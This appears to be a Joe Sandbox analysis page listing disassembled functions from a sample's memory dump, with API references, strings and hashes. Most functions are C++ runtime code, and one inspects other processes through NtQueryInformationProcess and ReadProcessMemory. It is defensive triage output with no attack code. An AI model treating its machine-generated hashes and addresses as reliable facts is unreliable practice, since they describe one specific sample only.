Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: H_prolog3Lockitstd::_$Lockit::_Lockit::~_
String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
API String ID: 1538362411-2891247106
Opcode ID: c9a630a29b30e7153c6b68a6989bdb0a43d9d4bac48132f700f685d21dbc00dd
Instruction ID: 0ee6a9677a50944fdfb9ebbea1bf683c7bdb0b01dbbd44e0e13267095817d1ce
Opcode Fuzzy Hash: c9a630a29b30e7153c6b68a6989bdb0a43d9d4bac48132f700f685d21dbc00dd
Instruction Fuzzy Hash: 80B1797650010AAACF19DFE8CE66FFE3BA9EB04700F04411EFA16A6251D731DE14DB61

Function 00CD0C9D Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 325COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CD0CA4

Part of subcall function 00CB9270: std::_Lockit::_Lockit.LIBCPMT ref: 00CB92A0
Part of subcall function 00CB9270: std::_Lockit::_Lockit.LIBCPMT ref: 00CB92C2
Part of subcall function 00CB9270: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB92EA
Part of subcall function 00CB9270: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB9422

Strings

%m / %d / %y, xrefs: 00CD0D9B
%b %d %H : %M : %S %Y, xrefs: 00CD0F32
%H : %M, xrefs: 00CD0DE3
%d / %m / %y, xrefs: 00CD0FDA
:AM:am:PM:pm, xrefs: 00CD100A
%H : %M : %S, xrefs: 00CD0E3D
%I : %M : %S %p, xrefs: 00CD0FFF

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
API String ID: 1383202999-2891247106
Opcode ID: 7e5b371987e72bd600f6429240abd7690777d1c65a762c0c8df14c5a77e1ed7b
Instruction ID: 5e33e1637bf8338829146a8980594327f8471d47a57d5e12d4e157292fa5bb5a
Opcode Fuzzy Hash: 7e5b371987e72bd600f6429240abd7690777d1c65a762c0c8df14c5a77e1ed7b
Instruction Fuzzy Hash: 71B1807150010AAFCF29DFA8C959EFE7BA9EF04300F24451BFB56A6351D631EA10DB61

Function 00CCBF7E Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 325COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CCBF85

Part of subcall function 00CB8610: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8657
Part of subcall function 00CB8610: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8679
Part of subcall function 00CB8610: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB86A1
Part of subcall function 00CB8610: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB880E

Strings

%m / %d / %y, xrefs: 00CCC07C
%b %d %H : %M : %S %Y, xrefs: 00CCC213
%H : %M, xrefs: 00CCC0C4
%d / %m / %y, xrefs: 00CCC2BB
:AM:am:PM:pm, xrefs: 00CCC2EB
%H : %M : %S, xrefs: 00CCC11E
%I : %M : %S %p, xrefs: 00CCC2E0

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
API String ID: 1383202999-2891247106
Opcode ID: 6fcc6e1a61b399f8f21b5715e5588b501cf99fc51926f0127a2e0b8c92e64ad6
Instruction ID: 5b54c31110fd78ab8a0e7f03882d9eba074f854ebf24cb70eeaad6eb62846f78
Opcode Fuzzy Hash: 6fcc6e1a61b399f8f21b5715e5588b501cf99fc51926f0127a2e0b8c92e64ad6
Instruction Fuzzy Hash: 80B1807250010AAFCF19DFA8C9D5FFE3BB9EB09340F19411DFA1AA6252D631DA10DB61

Function 00CC8555 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00CC855C
_Maklocstr.LIBCPMT ref: 00CC85C5
_Maklocstr.LIBCPMT ref: 00CC85D7
_Maklocchr.LIBCPMT ref: 00CC85EF
_Maklocchr.LIBCPMT ref: 00CC85FF
_Getvals.LIBCPMT ref: 00CC8621

Part of subcall function 00CC1CD4: _Maklocchr.LIBCPMT ref: 00CC1D03
Part of subcall function 00CC1CD4: _Maklocchr.LIBCPMT ref: 00CC1D19

Strings

true, xrefs: 00CC85D2
false, xrefs: 00CC85C0

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
String ID: false$true
API String ID: 3549167292-2658103896
Opcode ID: 29999372279a6958b9ac9bf8065a5156cbe454af70634ffbb6a81e14fbed64eb
Instruction ID: fee01598ffe36f789956a5ebd3185c8c0330fe1f488730bf0bc7ee7a19810f90
Opcode Fuzzy Hash: 29999372279a6958b9ac9bf8065a5156cbe454af70634ffbb6a81e14fbed64eb
Instruction Fuzzy Hash: 152141B1D00314AADF14EFA5D885FDF7BA8AF05710F04815AFD149F286DA708A44DBA1

Function 00CB9730 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 398COMMON

Download Yara Rule

APIs

std::locale::_Init.LIBCPMT ref: 00CB9763

Part of subcall function 00CC0C94: __EH_prolog3.LIBCMT ref: 00CC0C9B
Part of subcall function 00CC0C94: std::_Lockit::_Lockit.LIBCPMT ref: 00CC0CA6
Part of subcall function 00CC0C94: std::locale::_Setgloballocale.LIBCPMT ref: 00CC0CC1
Part of subcall function 00CC0C94: std::_Lockit::~_Lockit.LIBCPMT ref: 00CC0D17

std::_Lockit::_Lockit.LIBCPMT ref: 00CB978A
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00CB97F0
std::locale::_Locimp::_Makeloc.LIBCPMT ref: 00CB984A

Part of subcall function 00CBF57A: __EH_prolog3.LIBCMT ref: 00CBF581

LocalFree.KERNEL32(00000000,00000000,?,00D054B1,00000000), ref: 00CB99BF
__cftoe.LIBCMT ref: 00CB9B0B

Strings

bad locale name, xrefs: 00CB98FF

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: std::_$Lockitstd::locale::_$H_prolog3Lockit::_$FreeInitLocalLocimp::_Locinfo::_Locinfo_ctorLockit::~_MakelocSetgloballocale__cftoe
String ID: bad locale name
API String ID: 3578231455-1405518554
Opcode ID: 44b6731fc1445879b7694b93506ae10137e13abecdac6a9c17af501b3ca35614
Instruction ID: ef8a10b7626d430cc8b5832baa731017913704f5862d201cb5932379bc1fd8f0
Opcode Fuzzy Hash: 44b6731fc1445879b7694b93506ae10137e13abecdac6a9c17af501b3ca35614
Instruction Fuzzy Hash: EFF1B071D01248DFDF14CFA8D985BEEBBB5EF09304F244169E915AB381E7369A04CBA1

Function 00CB3C20 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 225libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00CB36D0: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00CB3735
Part of subcall function 00CB36D0: _wcschr.LIBVCRUNTIME ref: 00CB37C6

GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 00CB3CA8
ReadProcessMemory.KERNEL32(?,?,?,000001D8,00000000,00000000,00000018,00000000), ref: 00CB3D01
ReadProcessMemory.KERNEL32(?,?,?,00000048,00000000,?,000001D8,00000000,00000000,00000018,00000000), ref: 00CB3D7A
ReadProcessMemory.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,?,?,?,00000048,00000000,?,000001D8), ref: 00CB3EB1
GetLastError.KERNEL32 ref: 00CB3F34
FreeLibrary.KERNEL32(?), ref: 00CB3F7B

Strings

NtQueryInformationProcess, xrefs: 00CB3CA2

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: MemoryProcessRead$AddressDirectoryErrorFreeLastLibraryProcSystem_wcschr
String ID: NtQueryInformationProcess
API String ID: 566592816-2781105232
Opcode ID: 8ab1fb23e7a6d2e8ce1dc190729259345d1907671bed1aa07ba92fc24f8f7e75
Instruction ID: 3185c9762a221559d6f6bc87416e5a727188f89b831d73978f60b1c7cf5282fd
Opcode Fuzzy Hash: 8ab1fb23e7a6d2e8ce1dc190729259345d1907671bed1aa07ba92fc24f8f7e75
Instruction Fuzzy Hash: 09A14B70904659DEDB20CF64CC59BEEBBF4EF48304F204599D549A7280EBB5AA88CF51

Function 00CB40B0 Relevance: 12.2, APIs: 8, Instructions: 233memorytimeCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,40000022,665E9022,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00CB4154
LocalAlloc.KERNEL32(00000040,3FFFFFFF,665E9022,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00CB4177
LocalFree.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00CB4217
OpenProcess.KERNEL32(00000400,00000000,?,665E9022,?,?,?), ref: 00CB42D2
OpenProcess.KERNEL32(00000400,00000000,?,?,665E9022,?,?,?), ref: 00CB42F3
GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,665E9022,?,?,?), ref: 00CB4326
GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,665E9022,?,?,?), ref: 00CB4337
CloseHandle.KERNEL32(00000000,?,665E9022,?,?,?), ref: 00CB4355
CloseHandle.KERNEL32(00000000,?,665E9022,?,?,?), ref: 00CB4371

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: Process$Local$AllocCloseHandleOpenTimes$Free
String ID:
API String ID: 1424318461-0
Opcode ID: e0a46672c9b3fe3a0b7dc07d6e52ae92ccbe51c0aaad143d917cb5631adad0d5
Instruction ID: eea511b20b743c6a706d7c72a2e761c5f71f403a94bd6a441b67f2da9a67ea79
Opcode Fuzzy Hash: e0a46672c9b3fe3a0b7dc07d6e52ae92ccbe51c0aaad143d917cb5631adad0d5
Instruction Fuzzy Hash: C7818F71E042059FDB18CFA8D985BEEBBB5FB48310F244229E925E73D1D770AA01CB95

Function 00CD266D Relevance: 12.2, APIs: 8, Instructions: 224COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 00CD26F8
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00CD2786
__alloca_probe_16.LIBCMT ref: 00CD27B0
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00CD27F8
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00CD2812
__alloca_probe_16.LIBCMT ref: 00CD2838
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00CD2875
CompareStringEx.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00CD2892

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: ByteCharMultiWide$__alloca_probe_16$CompareInfoString
String ID:
API String ID: 3603178046-0
Opcode ID: dd808ae0e80cfc499c9b6d1618310b093cc790b9f14f989998f11e57c0a50fe9
Instruction ID: 0d21b85d4f4ae67fdf1c6eab750364a0ad408f411f3f3b3934297e75cea353d4
Opcode Fuzzy Hash: dd808ae0e80cfc499c9b6d1618310b093cc790b9f14f989998f11e57c0a50fe9
Instruction Fuzzy Hash: 5971A5329002469FDF219F65CC81AEE7BB6EF65350F25011BFA24A7390DB31CA41EB60

Function 00CD215A Relevance: 12.2, APIs: 8, Instructions: 175COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00CD21A3
__alloca_probe_16.LIBCMT ref: 00CD21CF
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00CD220E
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CD222B
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00CD226A
__alloca_probe_16.LIBCMT ref: 00CD2287
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CD22C9
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00CD22EC

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
Opcode ID: d54f927bb851a392a1f624f7874be307e806d2f5a66177b521d7613e94787ed7
Instruction ID: 999277f7ec4cda18e3d46f8eaab7a225af1c33bad2f5626d7b9b122a23aaacfe
Opcode Fuzzy Hash: d54f927bb851a392a1f624f7874be307e806d2f5a66177b521d7613e94787ed7
Instruction Fuzzy Hash: 8F51BF7290020ABBEF204F65CC45FAF7BA9EF64750F11412AFB25A6260DB34DE10DB60

Function 00CB8610 Relevance: 10.7, APIs: 7, Instructions: 157memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00CB8657
std::_Lockit::_Lockit.LIBCPMT ref: 00CB8679
std::_Lockit::~_Lockit.LIBCPMT ref: 00CB86A1
LocalAlloc.KERNEL32(00000040,00000044,00000000,665E9022,?,00000000), ref: 00CB86F9
__Getctype.LIBCPMT ref: 00CB877B
std::_Facet_Register.LIBCPMT ref: 00CB87E4
std::_Lockit::~_Lockit.LIBCPMT ref: 00CB880E

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_GetctypeLocalRegister
String ID:
API String ID: 2372200979-0
Opcode ID: c4c3be575cb54916369de70735da3df32ad51b7135bf6732e32597b661d60d16
Instruction ID: fc3f6e12dd045df78c80343932184fbb34b0e67ae15b708e3c8894916b7281af
Opcode Fuzzy Hash: c4c3be575cb54916369de70735da3df32ad51b7135bf6732e32597b661d60d16
Instruction Fuzzy Hash: AB61B1B1D00644DFDB11CF68C940BAABBF4EF14314F24825DE859AB391EB31AA45CB91

Function 00CB9270 Relevance: 10.6, APIs: 7, Instructions: 135memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00CB92A0
std::_Lockit::_Lockit.LIBCPMT ref: 00CB92C2
std::_Lockit::~_Lockit.LIBCPMT ref: 00CB92EA
LocalAlloc.KERNEL32(00000040,00000018,00000000,665E9022,?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00CB9342
__Getctype.LIBCPMT ref: 00CB93BD
std::_Facet_Register.LIBCPMT ref: 00CB93F8
std::_Lockit::~_Lockit.LIBCPMT ref: 00CB9422

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_GetctypeLocalRegister
String ID:
API String ID: 2372200979-0
Opcode ID: 752c03a37953891d39ad33aa30353f2da598205ae585a42c247ba681617e6c5d
Instruction ID: 38e0f14ffc36b416fbbbc3003717c234477e18dd1d9df68f8bc9e4b3e4055bf7
Opcode Fuzzy Hash: 752c03a37953891d39ad33aa30353f2da598205ae585a42c247ba681617e6c5d
Instruction Fuzzy Hash: 2451BC70904218DFCB11CFA8C444BEEBBF4EF14714F20825DE95AAB3A1D774AA41DBA1

Function 00CD3F20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00CD3F57
___except_validate_context_record.LIBVCRUNTIME ref: 00CD3F5F
_ValidateLocalCookies.LIBCMT ref: 00CD3FE8
__IsNonwritableInCurrentImage.LIBCMT ref: 00CD4013
_ValidateLocalCookies.LIBCMT ref: 00CD4068

Strings

csm, xrefs: 00CD3FFD

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 248669159106ebb00029ea0d6b160a5ba838abba7d788443f4aa04e26368797a
Instruction ID: 92c0f717658587ebd4a79eecd40391f8f74c3420fe4a6e5dad689b845e51f6da
Opcode Fuzzy Hash: 248669159106ebb00029ea0d6b160a5ba838abba7d788443f4aa04e26368797a
Instruction Fuzzy Hash: A5418334E0024D9BCF10DFA8C885A9EBBB5EF45314F148196EA149B392D731EB05CB92

Function 00CE72FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00CE7408,00CE3841,0000000C,?,00000000,00000000,?,00CE7632,00000021,FlsSetValue,00CFBD58,00CFBD60,?), ref: 00CE73BC

Strings

ext-ms-, xrefs: 00CE7366
api-ms-, xrefs: 00CE7352

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 2ae2436438983eb7382eed3a67b0807bf60619c1bd59c3e73065893998719b0f
Instruction ID: 113e04498c88fd15eb38d380eceae36415b022fc9436094f0f2d5348067c45a9
Opcode Fuzzy Hash: 2ae2436438983eb7382eed3a67b0807bf60619c1bd59c3e73065893998719b0f
Instruction Fuzzy Hash: A1212731A09291EBDB619B66DC45B6E37699F41760F240710FD25E73E0E730EE00E6E1

Function 00CC8969 Relevance: 9.4, APIs: 6, Instructions: 449COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CC8970
ctype.LIBCPMT ref: 00CC89B7

Part of subcall function 00CC851C: __Getctype.LIBCPMT ref: 00CC852B

Part of subcall function 00CC270D: __EH_prolog3.LIBCMT ref: 00CC2714
Part of subcall function 00CC270D: std::_Lockit::_Lockit.LIBCPMT ref: 00CC271E
Part of subcall function 00CC270D: std::_Lockit::~_Lockit.LIBCPMT ref: 00CC278F

Part of subcall function 00CBF3D9: __EH_prolog3.LIBCMT ref: 00CBF3E0
Part of subcall function 00CBF3D9: std::_Lockit::_Lockit.LIBCPMT ref: 00CBF3EA
Part of subcall function 00CBF3D9: std::_Lockit::~_Lockit.LIBCPMT ref: 00CBF48E

Part of subcall function 00CC2837: __EH_prolog3.LIBCMT ref: 00CC283E
Part of subcall function 00CC2837: std::_Lockit::_Lockit.LIBCPMT ref: 00CC2848
Part of subcall function 00CC2837: std::_Lockit::~_Lockit.LIBCPMT ref: 00CC28B9

Part of subcall function 00CBF3D9: Concurrency::cancel_current_task.LIBCPMT ref: 00CBF499

Part of subcall function 00CC29F6: __EH_prolog3.LIBCMT ref: 00CC29FD
Part of subcall function 00CC29F6: std::_Lockit::_Lockit.LIBCPMT ref: 00CC2A07
Part of subcall function 00CC29F6: std::_Lockit::~_Lockit.LIBCPMT ref: 00CC2A78

Part of subcall function 00CC2961: __EH_prolog3.LIBCMT ref: 00CC2968
Part of subcall function 00CC2961: std::_Lockit::_Lockit.LIBCPMT ref: 00CC2972
Part of subcall function 00CC2961: std::_Lockit::~_Lockit.LIBCPMT ref: 00CC29E3

collate.LIBCPMT ref: 00CC8B05
numpunct.LIBCPMT ref: 00CC8DAF
__Getcoll.LIBCPMT ref: 00CC8B47

Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78

Part of subcall function 00CB6330: LocalAlloc.KERNEL32(00000040,?,00CC0E04,00000020,?,?,00CB9942,00000000,665E9022,?,?,?,?,00CF50DD,000000FF), ref: 00CB6336

codecvt.LIBCPMT ref: 00CC8E6D

Part of subcall function 00CC2E09: __EH_prolog3.LIBCMT ref: 00CC2E10
Part of subcall function 00CC2E09: std::_Lockit::_Lockit.LIBCPMT ref: 00CC2E1A
Part of subcall function 00CC2E09: std::_Lockit::~_Lockit.LIBCPMT ref: 00CC2E8B

Part of subcall function 00CC2F33: __EH_prolog3.LIBCMT ref: 00CC2F3A
Part of subcall function 00CC2F33: std::_Lockit::_Lockit.LIBCPMT ref: 00CC2F44
Part of subcall function 00CC2F33: std::_Lockit::~_Lockit.LIBCPMT ref: 00CC2FB5

Part of subcall function 00CC22FA: __EH_prolog3.LIBCMT ref: 00CC2301
Part of subcall function 00CC22FA: std::_Lockit::_Lockit.LIBCPMT ref: 00CC230B
Part of subcall function 00CC22FA: std::_Lockit::~_Lockit.LIBCPMT ref: 00CC237C

Memory Dump Source

Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd

Similarity

API ID: Lockitstd::_$H_prolog3Lockit::_Lockit::~_$AllocConcurrency::cancel_current_taskGetcollGetctypeLocalcodecvtcollatectypenumpunct
String ID:
API String ID: 3494022857-0
Opcode ID: 533b9af9efbb920d892d1136ae5e3af7b1494d1e905020aeb3a65b3cccc311ed
Instruction ID: 64027c80bff9577a3fe73064a1a8ae6680dcb4b8aa50b3c0ebb67ec13da07bb0
Opcode Fuzzy Hash: 533b9af9efbb920d892d1136ae5e3af7b1494d1e905020aeb3a65b3cccc311ed
Instruction Fuzzy Hash: A6E1A0B4D01219ABEB106FA0CC42BBF7AA9EF41760F04442EF919A7391DF754D05A7B2

Function 00CBB500 Relevance: 9.2, APIs: 6, Instructions: 151memoryCOMMONLIBRARYCODE

Download Yara Rule

